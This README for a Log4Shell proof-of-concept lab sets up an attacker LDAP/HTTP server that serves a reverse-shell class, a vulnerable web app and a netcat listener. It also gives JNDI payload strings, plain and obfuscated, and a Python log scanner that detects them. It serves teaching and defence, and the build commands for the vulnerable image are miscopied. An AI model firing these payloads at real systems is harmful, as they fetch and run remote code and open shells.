This repository is a proof of concept for the CVE-2021-44228 (Log4Shell) vulnerability in Log4j 2.
It is derived from This Repo.
In this repository I have made an example of a vulnerable application and a demonstration of how to exploit it.
I have modified the upstream Python script to automate generation of the payload for this vulnerability.
In this repo there are two Dockerfiles for easy use, one in ./Docker-Ldap (the attacker side: the LDAP and HTTP servers) and one in ./Docker-Vuln (the vulnerable web application). They are described below.
The Docker-Ldap image downloads Java jdk-8u20 from my Google Drive, because Oracle requires you to create an account in order to download it from their site.
If you do not trust this, you can modify the download step in the Dockerfile and fetch the JDK from here (make sure you download the Java SE Development Kit 8u20 version for Linux). An old JDK is used deliberately: the Exploit class must be compiled for a class-file version the target JVM accepts, and JDK builds from 8u191 onward set com.sun.jndi.ldap.object.trustURLCodebase=false, which blocks the remote class loading this PoC relies on, so the vulnerable side needs an equally old runtime.
This Docker image runs a modified version of the script provided by kozmer, which does the following:
- Generates and compiles a Java class (named Exploit) that spawns a reverse shell; the JDK is required for this.
- Starts a JNDI LDAP server that answers lookups with a reference pointing at our HTTP server, where the payload class resides.
- Starts a SimpleHTTPServer that serves the compiled class when the victim JVM follows that reference.
The default ports are 1389 for the JNDI LDAP server, 8000 for the SimpleHTTPServer and 9001 for the reverse shell.
In order to build and run it:

```shell
sudo docker build -t log4j-ldap .
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldap
```

Use `docker logs <containerID>` to see the logs from the app and retrieve the exact payload string that has to be entered into the vulnerable app.
For this PoC I have assumed the default IPs used by Docker (172.17.0.1/24); you can change them in the ./Docker-Ldap/run.sh script to match your scenario.
The Docker-Vuln image runs a vulnerable web application that uses an unpatched version of Log4j 2 and exposes it on port 8080.
The app source is also available in ./Docker-Vuln, credits to kozmer.
In order to build and run it:

```shell
sudo docker build -t log4j-ldap .
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldap
```

(These are the same commands as for the LDAP image; give this image its own tag and publish port 8080 instead, which is what the config.sh script described below does for you.)
The username field is the injectable one!
In order to catch the reverse shell you must start a netcat listener on port 9001:

```shell
nc -lvnp 9001
```
After downloading the repo, make sure you have Docker Engine installed and that no other Docker containers are running on your machine.
- Run the config.sh script to build the images and start them (this script uses root privileges; modify it accordingly if needed).
- Open a netcat listener on port 9001.
- Fire up your browser and navigate to localhost:8080.
- Extract the payload from the log4j-ldap container logs (`docker logs <containerID>`).
- Enter the payload in the user field and a random password.
- Enjoy!
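The payload entered in the user field above is a Log4j lookup string of the form `${jndi:ldap://<ldap-host>:1389/...}`, and real-world probes hide the `jndi:` prefix behind nested lookups (`${lower:j}`, `${::-j}`, `${upper:...}`) so that a naive grep for `${jndi` misses them. The following Python script is an added example, not part of this repository or of kozmer's tooling: it resolves the nesting the way Log4j 2 (before 2.15) evaluates `lower:`, `upper:` and `:-default` lookups, then reports the de-obfuscated JNDI reference. The log lines are constructed for the example (the attacker address and ports mirror this PoC's defaults), and treating `env:`/`sys:` lookups as unset is an assumption made for detection purposes.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} (a body with no nested '${' or '}'); resolved repeatedly from
# the inside out, which is the evaluation order Log4j 2 uses for nested lookups.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# A JNDI reference once obfuscation has been stripped. Schemes are those Java's
# JNDI providers accept; the path ends at whitespace, a quote or a closing brace.
JNDI_RE = re.compile(
    r"jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|https?)://[^\s\"'}]*", re.IGNORECASE
)


def _resolve_one(body: str) -> str:
    """Evaluate a single, non-nested lookup body for the lookups attackers use
    to hide the 'jndi' prefix. Returns the replacement text."""
    if body.lower().startswith("jndi:"):
        # Keep the JNDI lookup itself intact so the caller can report it.
        return "${" + body + "}"
    # '${key:-default}': everything after the first ':-' is the default value.
    key, sep, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()  # Log4j lowercases lookup prefixes
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if sep:
        # '${::-j}', '${env:NOPE:-j}', '${sys:nope:-j}': assumption for detection,
        # the variable is treated as unset, so the default is what Log4j would emit.
        return default
    # Unknown lookup with no default ('${env:HOME}'): Log4j leaves it verbatim.
    # Dropping it here guarantees termination and lets 'j${env:x}ndi' collapse
    # to 'jndi', which is the aggressive choice we want in a detector.
    return ""


def normalize(text: str, max_rounds: int = 32) -> str:
    """Resolve nested lookups until nothing changes (or max_rounds is hit)."""
    for _ in range(max_rounds):
        resolved = LOOKUP_RE.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the de-obfuscated JNDI reference found in a log line, or None."""
    match = JNDI_RE.search(normalize(line))
    return match.group(0) if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, JNDI reference) for every line carrying a Log4Shell probe."""
    hits = []
    for number, line in enumerate(lines, start=1):
        ref = find_jndi(line)
        if ref:
            hits.append((number, ref))
    return hits


# Constructed access-log lines (not real traffic); the attacker address and
# ports mirror this PoC's defaults (172.17.0.1, LDAP on 1389).
SAMPLE_LOG = [
    '172.17.0.3 - - [10/Dec/2021:22:01:17 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.17.0.3 - - [10/Dec/2021:22:01:44 +0000] "POST /login HTTP/1.1" 200 512 "-" "${jndi:ldap://172.17.0.1:1389/a}"',
    '172.17.0.3 - - [10/Dec/2021:22:02:09 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://172.17.0.1:1389/a}"',
    '172.17.0.3 - - [10/Dec/2021:22:02:31 +0000] "GET / HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://172.17.0.1:1099/x}"',
    '172.17.0.3 - - [10/Dec/2021:22:03:02 +0000] "GET /price?x=${env:HOME} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, ref in scan(SAMPLE_LOG):
        print(f"line {number}: {ref}")
```

Run it against your own web-server or application logs (one line per list entry) to spot both the plain payload this PoC emits and the obfuscated variants; the `${env:HOME}` line shows that a lookup on its own is not enough to trigger, only a resolved `jndi:` reference is reported.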
- A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land
- Apache Log4j Security Vulnerabilities
- CVE-2021-44228
- CVE-2021-44228 Detail
- Log4j Lookups in Depth
- Log4j Vulnerability
- CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE
- Log4Shell: RCE 0-day exploit found in log4j 2
- How to Automatically Mitigate Log4Shell via a Live Patch
- Understanding Log4Shell via Exploitation and Live Patching
- How To Detect and Mitigate the Log4Shell Vulnerability